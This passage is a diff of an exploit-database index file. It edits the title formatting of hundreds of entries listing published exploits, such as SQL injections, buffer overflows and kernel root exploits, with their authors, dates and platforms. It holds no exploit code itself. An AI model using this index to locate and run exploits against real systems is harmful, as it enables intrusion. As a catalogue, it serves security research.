Exploit",2009-06-04,"Jon Oberheide",multiple,dos,0 8874,platforms/php/webapps/8874.txt,"SuperCali PHP Event Calendar Arbitrary Change Admin Password Exploit",2009-06-04,TiGeR-Dz,php,webapps,0 -8875,platforms/windows/local/8875.txt,"Online Armor < 3.5.0.12 (OAmon.sys) Local Privilege Escalation Exploit",2009-06-04,"NT Internals",windows,local,0 +8875,platforms/windows/local/8875.txt,"Online Armor < 3.5.0.12 - (OAmon.sys) Local Privilege Escalation Exploit",2009-06-04,"NT Internals",windows,local,0 8876,platforms/php/webapps/8876.htm,"Web Directory PRO - (admins.php) Change Admin Password Exploit",2009-06-04,TiGeR-Dz,php,webapps,0 8877,platforms/php/webapps/8877.txt,"Host Directory PRO 2.1.0 - Remote Database Backup Vulnerability",2009-06-04,ZoRLu,php,webapps,0 8878,platforms/php/webapps/8878.txt,"Web Directory PRO - Remote Database Backup Vulnerability",2009-06-04,TiGeR-Dz,php,webapps,0 @@ -8382,7 +8382,7 @@ id,file,description,date,author,platform,type,port 8884,platforms/php/webapps/8884.txt,"Kjtechforce mailman b1 (code) SQL Injection Delete Row Vulnerability",2009-06-05,YEnH4ckEr,php,webapps,0 8885,platforms/php/webapps/8885.pl,"Kjtechforce mailman b1 (dest) Remote Blind SQL Injection Exploit",2009-06-05,YEnH4ckEr,php,webapps,0 8886,platforms/php/webapps/8886.txt,"MyCars Automotive (Auth Bypass) SQL Injection Vulnerability",2009-06-08,snakespc,php,webapps,0 -8889,platforms/asp/webapps/8889.txt,"VT-Auth 1.0 (zHk8dEes3.txt) File Disclosure Vulnerability",2009-06-08,ByALBAYX,asp,webapps,0 +8889,platforms/asp/webapps/8889.txt,"VT-Auth 1.0 - (zHk8dEes3.txt) File Disclosure Vulnerability",2009-06-08,ByALBAYX,asp,webapps,0 8890,platforms/asp/webapps/8890.txt,"fipsCMS Light 2.1 (db.mdb) Remote Database Disclosure Vulnerability",2009-06-08,ByALBAYX,asp,webapps,0 8891,platforms/php/webapps/8891.txt,"Joomla Component com_school 1.4 (classid) SQL Injection Vulnerability",2009-06-08,"Chip d3 bi0s",php,webapps,0 8892,platforms/php/webapps/8892.txt,"Virtue Classifieds (category) SQL Injection Vulnerability",2009-06-08,OzX,php,webapps,0 @@ -8620,7 +8620,7 @@ id,file,description,date,author,platform,type,port 9137,platforms/windows/remote/9137.html,"Mozilla Firefox 3.5 (Font tags) Remote Buffer Overflow Exploit",2009-07-13,Sberry,windows,remote,0 9138,platforms/php/webapps/9138.txt,"onepound shop 1.x products.php SQL Injection Vulnerability",2009-07-13,Affix,php,webapps,0 9139,platforms/windows/remote/9139.pl,"JetAudio 7.5.3 COWON Media Center - (.wav ) Crash Exploit",2009-07-14,prodigy,windows,remote,0 -9140,platforms/cgi/webapps/9140.txt,"DJ Calendar (DJcalendar.cgi TEMPLATE) File Disclosure Vuln",2009-07-14,cibbao,cgi,webapps,0 +9140,platforms/cgi/webapps/9140.txt,"DJ Calendar - (DJcalendar.cgi TEMPLATE) File Disclosure Vuln",2009-07-14,cibbao,cgi,webapps,0 9141,platforms/windows/dos/9141.pl,"Icarus 2.0 - (.ICP) Local Stack Overflow PoC",2009-07-14,"ThE g0bL!N",windows,dos,0 9142,platforms/windows/local/9142.c,"Live For Speed 2 Version Z .Mpr - Local Buffer Overflow Exploit",2009-07-14,n00b,windows,local,0 9143,platforms/linux/remote/9143.txt,"Virtualmin < 3.703 - Multiple Local/Remote Vulnerabilities",2009-07-14,"Filip Palian",linux,remote,0 @@ -8805,7 +8805,7 @@ id,file,description,date,author,platform,type,port 9331,platforms/php/webapps/9331.txt,"ProjectButler 1.5.0 (pda_projects.php offset) RFI Vulnerability",2009-08-03,"cr4wl3r ",php,webapps,0 9332,platforms/php/webapps/9332.txt,"Ajax Short URL Script (Auth Bypass) SQL Injection Vulnerability",2009-08-03,Cicklow,php,webapps,0 9333,platforms/php/webapps/9333.txt,"Netpet CMS 1.9 (confirm.php language) Local File Inclusion Vulnerability",2009-08-03,SirGod,php,webapps,0 -9334,platforms/php/webapps/9334.txt,"QuickDev 4 (download.php file) File Disclosure Vulnerability",2009-08-03,SirGod,php,webapps,0 +9334,platforms/php/webapps/9334.txt,"QuickDev 4 - (download.php file) File Disclosure Vulnerability",2009-08-03,SirGod,php,webapps,0 9335,platforms/php/webapps/9335.txt,"TT Web Site Manager 0.5 (Auth Bypass) SQL Injection Vulnerability",2009-08-03,SirGod,php,webapps,0 9336,platforms/php/webapps/9336.txt,"SimpleLoginSys 0.5 (Auth Bypass) SQL Injection Vulnerability",2009-08-03,SirGod,php,webapps,0 9337,platforms/php/webapps/9337.txt,"simplePHPWeb 0.2 (files.php) Authentication Bypass Vulnerability",2009-08-03,SirGod,php,webapps,0 @@ -8900,7 +8900,7 @@ id,file,description,date,author,platform,type,port 9433,platforms/php/webapps/9433.txt,"Gazelle CMS 1.0 - Remote Arbitrary Shell Upload Vulnerability",2009-08-13,RoMaNcYxHaCkEr,php,webapps,0 9434,platforms/php/webapps/9434.txt,"tgs CMS 0.x (xss/sql/fd) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0 9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x - sock_sendpage() Local Ring0 Root Exploit",2009-08-14,spender,linux,local,0 -9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (2)",2009-08-14,"Przemyslaw Frasunek",linux,local,0 +9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (#2)",2009-08-14,"Przemyslaw Frasunek",linux,local,0 9437,platforms/php/webapps/9437.txt,"Ignition 1.2 (comment) Remote Code Injection Vulnerability",2009-08-14,IRCRASH,php,webapps,0 9438,platforms/php/webapps/9438.txt,"PHP Competition System <= 0.84 (competition) SQL Injection Vuln",2009-08-14,Mr.SQL,php,webapps,0 9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 (nFileId) Remote SQL Injection Vulnerability",2009-08-14,Mr.tro0oqy,php,webapps,0 @@ -9058,7 +9058,7 @@ id,file,description,date,author,platform,type,port 9595,platforms/linux/local/9595.c,"HTMLDOC 1.8.27 (html File Handling) Stack Buffer Overflow Exploit",2009-09-09,"Pankaj Kohli",linux,local,0 9596,platforms/windows/remote/9596.py,"SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)",2009-09-09,SkuLL-HackeR,windows,remote,389 9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service Exploit",2009-09-09,karak0rsan,windows,dos,0 -9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 - sock_sendpage() Local Root Exploit (2)",2009-09-09,"Ramon Valle",linux,local,0 +9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 - sock_sendpage() Local Root Exploit (#2)",2009-09-09,"Ramon Valle",linux,local,0 9599,platforms/php/webapps/9599.txt,"The Rat CMS Alpha 2 - Arbitrary File Upload Vulnerability",2009-09-09,Securitylab.ir,php,webapps,0 9600,platforms/php/webapps/9600.txt,"OBOphiX <= 2.7.0 (fonctions_racine.php) Remote File Inclusion Vuln",2009-09-09,"EA Ngel",php,webapps,0 9601,platforms/php/webapps/9601.php,"Joomla Component BF Survey Pro Free SQL Injection Exploit",2009-09-09,jdc,php,webapps,0 @@ -9099,7 +9099,7 @@ id,file,description,date,author,platform,type,port 9638,platforms/windows/remote/9638.txt,"Kolibri+ Webserver 2 - Remote Source Code Disclosure Vulnerability",2009-09-11,SkuLL-HackeR,windows,remote,0 9639,platforms/php/webapps/9639.txt,"Image voting 1.0 (index.php show) SQL Injection Vulnerability",2009-09-11,SkuLL-HackeR,php,webapps,0 9640,platforms/php/webapps/9640.txt,"gyro 5.0 (sql/XSS) Multiple Vulnerabilities",2009-09-11,OoN_Boy,php,webapps,0 -9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - sock_sendpage() Local Root Exploit (3)",2009-09-11,"Ramon Valle",linux,local,0 +9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - sock_sendpage() Local Root Exploit (#3)",2009-09-11,"Ramon Valle",linux,local,0 9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-length Tunnel-Password DoS Exploit",2009-09-11,"Matthew Gillespie",multiple,dos,1812 9643,platforms/windows/remote/9643.txt,"kolibri+ webserver 2 - Directory Traversal Vulnerability",2009-09-11,"Usman Saeed",windows,remote,0 9644,platforms/windows/remote/9644.py,"Kolibri+ Webserver 2 - (GET Request) Remote SEH Overwrite Exploit",2009-09-11,blake,windows,remote,80 @@ -9506,12 +9506,12 @@ id,file,description,date,author,platform,type,port 10201,platforms/windows/local/10201.pl,"TEKUVA Password Reminder Authentication Bypass",2009-11-21,iqlusion,windows,local,0 10202,platforms/linux/dos/10202.txt,"Linux Kernel < 2.6.31-rc4 nfs4_proc_lock() Denial of Service",2009-10-15,"Simon Vallet",linux,dos,0 10203,platforms/linux/dos/10203.txt,"BibTeX - (.bib) File Handling Memory Corruption Vulnerability",2009-11-13,"Vincent Lafevre",linux,dos,0 -10204,platforms/windows/dos/10204.txt,"Foxit Reader COM Objects Memory Corruption Remote Code Execution Vulnerability",2009-11-19,mrx,windows,dos,0 -10205,platforms/multiple/dos/10205.txt,"LibTIFF 'LZWDecodeCompat()' Remote Buffer Underflow Vulnerability",2009-11-12,wololo,multiple,dos,0 +10204,platforms/windows/dos/10204.txt,"Foxit Reader - COM Objects Memory Corruption Remote Code Execution Vulnerability",2009-11-19,mrx,windows,dos,0 +10205,platforms/multiple/dos/10205.txt,"LibTIFF - 'LZWDecodeCompat()' Remote Buffer Underflow Vulnerability",2009-11-12,wololo,multiple,dos,0 10206,platforms/linux/dos/10206.txt,"Expat 2.0.1 UTF-8 Character XML Parsing Remote Denial of Service Vulnerability",2009-11-12,"Peter Valchev",linux,dos,0 10207,platforms/multiple/local/10207.txt,"VMWare Virtual 8086 - Linux - Local Ring0 Exploit",2009-10-27,"Tavis Ormandy and Julien Tinnes",multiple,local,0 -10208,platforms/windows/dos/10208.txt,"Firefox + Adobe Memory Corruption PoC",2009-10-14,Skylined,windows,dos,0 -10209,platforms//webapps/10209.txt,"Everfocus <= 1.4 EDSR Remote Authentication Bypass",2009-10-14,"Andrea Fabrizi",,webapps,0 +10208,platforms/windows/dos/10208.txt,"Firefox + Adobe - Memory Corruption PoC",2009-10-14,Skylined,windows,dos,0 +10209,platforms/multiple/webapps/10209.txt,"Everfocus <= 1.4 - EDSR Remote Authentication Bypass",2009-10-14,"Andrea Fabrizi",multiple,webapps,0 10210,platforms/windows/dos/10210.txt,"Internet Explorer 6/7 CSS Handling Denial of Service",2009-11-20,K4mr4n_st,windows,dos,0 10211,platforms/windows/local/10211.txt,"Autodesk SoftImage Scene TOC Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 10212,platforms/windows/local/10212.txt,"Autodesk 3DS Max Application Callbacks Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 @@ -10160,7 +10160,7 @@ id,file,description,date,author,platform,type,port 11034,platforms/windows/dos/11034.txt,"Microsoft HTML Help Compiler (hhc.exe) BoF PoC",2010-01-06,s4squatch,windows,dos,0 11035,platforms/php/webapps/11035.txt,"Joomla Component com_king Blind SQL Injection Vulnerability",2010-01-06,Pyske,php,webapps,0 11036,platforms/php/webapps/11036.txt,"RoundCube Webmail Multiple Vulerabilities",2010-01-06,"j4ck and Globus",php,webapps,0 -11043,platforms/hardware/dos/11043.txt,"Total Multimedia Features DoS PoC for Sony Ericsson Phones",2010-01-06,Aodrulez,hardware,dos,0 +11043,platforms/hardware/dos/11043.txt,"Total Multimedia Features - DoS PoC for Sony Ericsson Phones",2010-01-06,Aodrulez,hardware,dos,0 11044,platforms/linux/dos/11044.txt,"Gnome Panel <= 2.28.0 - Denial of Service PoC (0day)",2010-01-06,"Pietro Oliva",linux,dos,0 11045,platforms/php/webapps/11045.txt,"SpawCMS Editor Shell Upload Vulnerability",2010-01-06,j4ck,php,webapps,0 11046,platforms/windows/local/11046.py,"Quick Player 1.2 -Unicode BoF - bindshell",2010-01-06,sinn3r,windows,local,0 @@ -10173,7 +10173,7 @@ id,file,description,date,author,platform,type,port 11059,platforms/windows/remote/11059.html,"JcomBand toolbar on IE ActiveX Buffer Overflow Exploit",2010-01-07,"germaya_x and D3V!L FUCKER",windows,remote,0 11060,platforms/php/webapps/11060.txt,"Drupal <= 6.15 - Multiple Permanent XSS (0day)",2010-01-07,emgent,php,webapps,80 11061,platforms/php/webapps/11061.txt,"Joomla Component Regional Booking (id) Blind SQL Injection Vulnerability",2010-01-07,"Hussin X",php,webapps,0 -11062,platforms/windows/dos/11062.txt,"SopCast SopCore Control ActiveX - Remote Exec PoC (0dat)",2010-01-08,superli,windows,dos,0 +11062,platforms/windows/dos/11062.txt,"SopCast SopCore Control ActiveX - Remote Exec PoC (0day)",2010-01-08,superli,windows,dos,0 11063,platforms/php/webapps/11063.txt,"CU Village CMS Site 1.0 (print_view) Blind SQL Injection Vulnerability",2010-01-08,Red-D3v1L,php,webapps,0 11064,platforms/windows/dos/11064.txt,"UUSee ReliPlayer ActiveX - Remote Exec PoC (0day)",2010-01-08,superli,windows,dos,0 11065,platforms/windows/dos/11065.html,"SPlayer XvidDecoder 3.3 - ActiveX Remote Exec PoC (0day)",2010-01-08,superli,windows,dos,0 @@ -10201,7 +10201,7 @@ id,file,description,date,author,platform,type,port 11096,platforms/asp/webapps/11096.txt,"ABB 1.1 - Forum Remote Database Disclosure Vulnerability",2010-01-10,"ViRuSMaN ",asp,webapps,0 11097,platforms/asp/webapps/11097.txt,"Egreetings 1.0 b - Remote Database Disclosure Vulnerability",2010-01-10,"ViRuSMaN ",asp,webapps,0 11098,platforms/asp/webapps/11098.txt,"E-membres 1.0 - Remote Database Disclosure Vulnerability",2010-01-10,"ViRuSMaN ",asp,webapps,0 -11101,platforms/hardware/webapps/11101.txt,"Multiple D-Link Routers Authentication Bypass Vulnerability",2010-01-10,"SourceSec DevTeam",hardware,webapps,0 +11101,platforms/hardware/webapps/11101.txt,"D-Link Routers - Authentication Bypass Vulnerability",2010-01-10,"SourceSec DevTeam",hardware,webapps,0 11103,platforms/windows/dos/11103.html,"VLC Player 0.8.6i - ActiveX DoS PoC",2010-01-10,"D3V!L FUCKER and germaya_x",windows,dos,0 11104,platforms/php/webapps/11104.txt,"CMScontrol 7.x File Upload",2010-01-11,Cyber_945,php,webapps,0 11106,platforms/multiple/dos/11106.bat,"Nuked KLan <= 1.7.7 & <= SP4 DoS",2010-01-11,"Hamza 'MIzoZ' N",multiple,dos,0 @@ -10262,7 +10262,7 @@ id,file,description,date,author,platform,type,port 11178,platforms/php/webapps/11178.txt,"Joomla Component com_libros SQL Injection Vulnerability",2010-01-17,FL0RiX,php,webapps,0 11179,platforms/windows/remote/11179.rb,"Exploit EFS Software Easy Chat Server 2.2",2010-01-18,"John Babio",windows,remote,0 11180,platforms/windows/dos/11180.pl,"Muziic Player 2.0 - (.mp3) Local Denial of Service (DoS)",2010-01-18,Red-D3v1L,windows,dos,0 -11182,platforms/windows/dos/11182.txt,"Internet Explorer 6/7/8 DoS Vulnerability (Shockwave Flash Object)",2010-01-18,"Mert SARICA",windows,dos,0 +11182,platforms/windows/dos/11182.txt,"Internet Explorer 6/7/8 - DoS Vulnerability (Shockwave Flash Object)",2010-01-18,"Mert SARICA",windows,dos,0 11183,platforms/php/webapps/11183.txt,"Testlink TestManagement and Execution System 1.8.5 - Multiple Directory Traversal Vulnerabilites",2010-01-18,"Prashant Khandelwal",php,webapps,0 11184,platforms/multiple/webapps/11184.txt,"FreePBX 2.5.x - 2.6.0 - Permanent Cross-Site Scripting (XSS)",2010-01-18,"Ivan Huertas",multiple,webapps,0 11185,platforms/php/webapps/11185.html,"al3jeb script Remote Change Password Exploit",2010-01-18,alnjm33,php,webapps,0 @@ -10272,7 +10272,7 @@ id,file,description,date,author,platform,type,port 11189,platforms/php/webapps/11189.txt,"Soft Direct 1.05 - Multiple Vulnerabilities",2010-01-18,indoushka,php,webapps,0 11190,platforms/windows/dos/11190.txt,"AOL 9.5 - ActiveX Heap Overflow Vulnerability",2010-01-19,"Hellcode Research",windows,dos,0 11191,platforms/windows/local/11191.pl,"Millenium MP3 Studio 1.x - (.m3u) Local Stack Overflow",2010-01-19,NeoCortex,windows,local,0 -11192,platforms/windows/dos/11192.txt,"OpenOffice - (.slk) File Parsing Null Pointer Vulnerability",2010-01-19,"Hellcode Research",windows,dos,0 +11192,platforms/windows/dos/11192.txt,"OpenOffice - (.slk File) Parsing Null Pointer Vulnerability",2010-01-19,"Hellcode Research",windows,dos,0 11195,platforms/windows/dos/11195.html,"Microsoft Windows Defender ActiveX Heap Overflow PoC",2010-01-19,SarBoT511,windows,dos,0 11196,platforms/windows/dos/11196.html,"Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow PoC",2010-01-19,"SarBoT511 and D3V!L FUCKER",windows,dos,0 11197,platforms/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 - (.smi) Local Buffer Overflow PoC",2010-01-19,d3b4g,windows,dos,0 @@ -10285,7 +10285,7 @@ id,file,description,date,author,platform,type,port 11208,platforms/windows/local/11208.pl,"jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit",2010-01-21,"cr4wl3r ",windows,local,0 11209,platforms/windows/dos/11209.pl,"jetAudio 8.0.0.2 Basic (.asx) - Local Crash Exploit",2010-01-21,"cr4wl3r ",windows,dos,0 11210,platforms/windows/remote/11210.rb,"EFS Easy Chat server Universal BOF-SEH (Meta)",2010-01-21,fb1h2s,windows,remote,0 -11211,platforms/multiple/webapps/11211.txt,"cPanel HTTP Response Splitting Vulnerability",2010-01-21,Trancer,multiple,webapps,0 +11211,platforms/multiple/webapps/11211.txt,"cPanel - HTTP Response Splitting Vulnerability",2010-01-21,Trancer,multiple,webapps,0 11212,platforms/asp/webapps/11212.txt,"eWebeditor Directory Traversal",2010-01-21,N/A,asp,webapps,0 11213,platforms/php/webapps/11213.txt,"Joomla Component com_book SQL Injection Vulnerability",2010-01-21,Evil-Cod3r,php,webapps,0 11214,platforms/windows/dos/11214.html,"Windows Live Messenger 2009 - ActiveX Heap Overflow PoC",2010-01-21,SarBoT511,windows,dos,0 @@ -10314,8 +10314,8 @@ id,file,description,date,author,platform,type,port 11240,platforms/php/webapps/11240.txt,"OpenDb 1.5.0.4 - Multiple LFI Vulnerability",2010-01-23,"ViRuSMaN ",php,webapps,0 11243,platforms/windows/webapps/11243.txt,"Joomla (com_mochigames) SQL Injection Vulnerability",2010-01-24,B-HUNT3|2,windows,webapps,0 11244,platforms/php/webapps/11244.txt,"Silverstripe <= 2.3.5 - CSRForgery and Open Redirection Vulnerabilities",2010-01-24,"cp77fk4r ",php,webapps,0 -11245,platforms/windows/dos/11245.txt,"Firefox 3.6 (XML parser) Memory Corruption PoC/DoS",2010-01-24,d3b4g,windows,dos,0 -11247,platforms/windows/dos/11247.txt,"Opera 10.10 (XML parser) Denial of Service PoC",2010-01-24,d3b4g,windows,dos,0 +11245,platforms/windows/dos/11245.txt,"Firefox 3.6 - (XML parser) Memory Corruption PoC/DoS",2010-01-24,d3b4g,windows,dos,0 +11247,platforms/windows/dos/11247.txt,"Opera 10.10 - (XML parser) Denial of Service PoC",2010-01-24,d3b4g,windows,dos,0 11248,platforms/windows/dos/11248.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow PoC",2010-01-24,Debug,windows,dos,0 11249,platforms/php/webapps/11249.txt,"boastMachine 3.1 - Remote File Upload Vulnerability",2010-01-24,alnjm33,php,webapps,0 11254,platforms/windows/dos/11254.pl,"P2GChinchilla HTTP Server 1.1.1 - Denial of Service Exploit",2010-01-24,"Zer0 Thunder",windows,dos,0 @@ -10626,7 +10626,7 @@ id,file,description,date,author,platform,type,port 11612,platforms/php/webapps/11612.txt,"osCSS 1.2.1 - Database Backups Disclosure",2010-03-02,indoushka,php,webapps,0 11613,platforms/php/webapps/11613.txt,"PHP Advanced Transfer Manager 1.10 - Shell Upload Vulnerability",2010-03-02,indoushka,php,webapps,0 11614,platforms/php/webapps/11614.txt,"Uploadify Sample Collection Shell Upload Vulnerability",2010-03-02,indoushka,php,webapps,0 -11615,platforms/win32/remote/11615.txt,"Internet Explorer 'winhlp32.exe' 'MsgBox()' Remote Code Execution Vulnerability",2010-03-02,"Maurycy Prodeus ",win32,remote,0 +11615,platforms/win32/remote/11615.txt,"Internet Explorer - 'winhlp32.exe' 'MsgBox()' Remote Code Execution Vulnerability",2010-03-02,"Maurycy Prodeus ",win32,remote,0 11616,platforms/php/webapps/11616.txt,"My Little Forum contact.php SQL Injection",2010-03-02,"Easy Laster",php,webapps,0 11617,platforms/windows/dos/11617.txt,"Opera + Mozilla Firefox 3.6 - Long String Crash Exploit (0day)",2010-03-02,"Asheesh kumar Mani Tripathi",windows,dos,0 11618,platforms/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Buffer Overflow Exploit",2010-03-02,"S2 Crew",windows,remote,0 @@ -10788,13 +10788,13 @@ id,file,description,date,author,platform,type,port 11791,platforms/windows/local/11791.pl,"myMP3-Player 3.0 - (.m3u) Local Buffer Overflow Exploit (SEH)",2010-03-18,n3w7u,windows,local,0 11792,platforms/multiple/dos/11792.pl,"mplayer <= 4.4.1 NULL pointer dereference Exploit PoC",2010-03-18,"Pietro Oliva",multiple,dos,0 11793,platforms/jsp/webapps/11793.txt,"Manage Engine Service Desk Plus 7.6 - woID SQL Injection",2010-03-18,"Nahuel Grisolia",jsp,webapps,0 -11794,platforms/windows/local/11794.c,"MediaCoder (.lst) file Local Buffer Overflow Exploit",2010-03-18,"fl0 fl0w",windows,local,0 +11794,platforms/windows/local/11794.c,"MediaCoder - (.lst file) Local Buffer Overflow Exploit",2010-03-18,"fl0 fl0w",windows,local,0 11795,platforms/php/webapps/11795.txt,"DewNewPHPLinks 2.1.0.1 - LFI",2010-03-18,ITSecTeam,php,webapps,0 11797,platforms/windows/local/11797.py,"ZippHo 3.0.6 - (.zip) Stack Buffer Overflow PoC Exploit (0day)",2010-03-18,mr_me,windows,local,0 11799,platforms/php/webapps/11799.txt,"SiteDone Custom Edition 2.0 - SQL Injection & XSS Vulnerability",2010-03-18,d3v1l,php,webapps,0 11801,platforms/php/webapps/11801.txt,"phpAuthent 0.2.1 - SQL Injection Vulnerability",2010-03-18,Gamoscu,php,webapps,0 11802,platforms/php/webapps/11802.txt,"philboard 1.02 - SQL Injection Vulnerability",2010-03-18,ViRuS_HiMa,php,webapps,0 -11803,platforms/windows/dos/11803.txt,"Crimson Editor SEH Overwrite Vulnerability",2010-03-18,sharpe,windows,dos,0 +11803,platforms/windows/dos/11803.txt,"Crimson Editor - SEH Overwrite Vulnerability",2010-03-18,sharpe,windows,dos,0 11805,platforms/php/webapps/11805.txt,"phpscripte24 Niedrig Gebote Pro Auktions System II Blind SQL Injection",2010-03-18,"Easy Laster",php,webapps,0 11806,platforms/php/webapps/11806.txt,"nensor CMS 2.01 - Multiple Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0 11807,platforms/php/webapps/11807.txt,"SOFTSAURUS 2.01 - Multiple Remote File Include Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0 @@ -12141,7 +12141,7 @@ id,file,description,date,author,platform,type,port 13784,platforms/php/webapps/13784.txt,"HauntmAx CMS Haunted House Directory Listing SQL Injection",2010-06-09,Sid3^effects,php,webapps,0 13785,platforms/php/webapps/13785.txt,"eLms Pro SQLi and XSS Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 13786,platforms/php/webapps/13786.txt,"PGAUTOPro SQLi and XSS Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 -13787,platforms/multiple/remote/13787.txt,"Adobe Flash and Reader - Exploit PoC (from the wild) (0day)",2010-06-09,Unknown,multiple,remote,0 +13787,platforms/multiple/remote/13787.txt,"Adobe Flash and Reader - Exploit PoC (0day)",2010-06-09,Unknown,multiple,remote,0 13788,platforms/asp/webapps/13788.txt,"Web Wiz Forums 9.68 SQLi Vulnerability",2010-06-09,Sid3^effects,asp,webapps,0 13789,platforms/asp/webapps/13789.txt,"Virtual Real Estate Manager 3.5 - SQLi Vulnerability",2010-06-09,Sid3^effects,asp,webapps,0 14294,platforms/php/webapps/14294.txt,"sphider 1.3.5 - Remote File Inclusion Vulnerability",2010-07-09,Li0n-PaL,php,webapps,0 @@ -12178,9 +12178,9 @@ id,file,description,date,author,platform,type,port 13819,platforms/php/webapps/13819.txt,"E-PHP B2B Marketplace Multiple Vulns",2010-06-11,MizoZ,php,webapps,0 13820,platforms/windows/local/13820.pl,"Power Tab Editor 1.7 (Build 80) - Buffer Overflow",2010-06-11,sud0,windows,local,0 13822,platforms/windows/remote/13822.txt,"Nginx <= 0.7.65 / 0.8.39 (dev) - Source Disclosure / Download Vulnerability",2010-06-11,"Jose A. Vazquez",windows,remote,0 -13823,platforms/hardware/dos/13823.txt,"Savy Soda Documents (Mobile Office Suite) XLS Denial-of-Service",2010-06-11,"Matthew Bergin",hardware,dos,0 -13824,platforms/hardware/dos/13824.txt,"Office^2 iPhone XLS Denial-of-Service",2010-06-11,"Matthew Bergin",hardware,dos,0 -13825,platforms/hardware/dos/13825.txt,"GoodiWare GoodReader iPhone XLS Denial-of-Service",2010-06-11,"Matthew Bergin",hardware,dos,0 +13823,platforms/hardware/dos/13823.txt,"Savy Soda Documents - (Mobile Office Suite) XLS Denial-of-Service",2010-06-11,"Matthew Bergin",hardware,dos,0 +13824,platforms/hardware/dos/13824.txt,"Office^2 iPhone - XLS Denial-of-Service",2010-06-11,"Matthew Bergin",hardware,dos,0 +13825,platforms/hardware/dos/13825.txt,"GoodiWare GoodReader iPhone - XLS Denial-of-Service",2010-06-11,"Matthew Bergin",hardware,dos,0 13826,platforms/php/webapps/13826.txt,"Site for Real Estate - Brokers SQL Injection Vulnerability",2010-06-11,"L0rd CrusAd3r",php,webapps,0 13827,platforms/php/webapps/13827.txt,"Development Site Professional Liberal - Company Institutional SQL Injection Vulnerability",2010-06-11,"L0rd CrusAd3r",php,webapps,0 13828,platforms/windows/shellcode/13828.c,"Allwin MessageBoxA Shellcode",2010-06-11,RubberDuck,windows,shellcode,0 @@ -12556,7 +12556,7 @@ id,file,description,date,author,platform,type,port 14278,platforms/php/webapps/14278.txt,"Inout Article Base Ultimate Shell Upload Vulnerabilty",2010-07-08,SONIC,php,webapps,0 14279,platforms/php/webapps/14279.txt,"Inout Ad server Ultimate Shell Upload Vulnerabilty",2010-07-08,SONIC,php,webapps,0 14280,platforms/php/webapps/14280.txt,"PG Social Networking Shell Upload Vulnerabilty",2010-07-08,SONIC,php,webapps,0 -14286,platforms/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter Integer Overflow and Array Indexing Overflow",2010-07-08,"Luigi Auriemma",windows,dos,0 +14286,platforms/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow",2010-07-08,"Luigi Auriemma",windows,dos,0 14281,platforms/asp/webapps/14281.txt,"KMSoft GB SQL Injection Vulnerabilty",2010-07-08,SONIC,asp,webapps,0 14282,platforms/windows/dos/14282.txt,"cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0 14283,platforms/asp/webapps/14283.txt,"ClickGallery Server SQL Injection Vulnerability",2010-07-08,SONIC,asp,webapps,0 @@ -12600,7 +12600,7 @@ id,file,description,date,author,platform,type,port 14342,platforms/php/webapps/14342.html,"Grafik CMS 1.1.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 14355,platforms/windows/webapps/14355.txt,"dotDefender 4.02 - Authentication Bypass Vulnerability",2010-07-13,"David K",windows,webapps,0 14344,platforms/windows/dos/14344.c,"Corel WordPerfect Office X5 15.0.0.357 (wpd) Buffer Overflow PoC",2010-07-12,LiquidWorm,windows,dos,0 -14346,platforms/windows/dos/14346.txt,"Corel Presentations X5 15.0.0.357 (shw) Buffer Preoccupation PoC",2010-07-12,LiquidWorm,windows,dos,0 +14346,platforms/windows/dos/14346.txt,"Corel Presentations X5 15.0.0.357 - (shw) Buffer Preoccupation PoC",2010-07-12,LiquidWorm,windows,dos,0 14350,platforms/php/webapps/14350.txt,"Joomla Component QContacts (com_qcontacts) SQL Injection Vulnerability",2010-07-13,_mlk_,php,webapps,0 14349,platforms/windows/dos/14349.html,"Opera - Denial of Service by canvas Element",2010-07-12,"Pouya Daneshmand",windows,dos,0 14351,platforms/php/webapps/14351.txt,"I-net Enquiry Management Script SQL Injection Vulnerability",2010-07-13,D4rk357,php,webapps,0 @@ -12649,7 +12649,7 @@ id,file,description,date,author,platform,type,port 14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - LIST Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-17,"Karn Ganeshen",windows,remote,0 14401,platforms/asp/webapps/14401.txt,"ClickAndRank Script - Authentication Bypass",2010-07-18,walid,asp,webapps,0 14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - CWD Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-18,fdiskyou,windows,remote,0 -14403,platforms/windows/local/14403.txt,"Microsoft Windows Automatic LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0 +14403,platforms/windows/local/14403.txt,"Microsoft Windows - Automatic LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0 14406,platforms/bsd/local/14406.pl,"GhostScript PostScript File Stack Overflow Exploit",2010-07-18,"Rodrigo Rubira Branco",bsd,local,0 14407,platforms/aix/remote/14407.c,"rpc.pcnfsd Remote Format 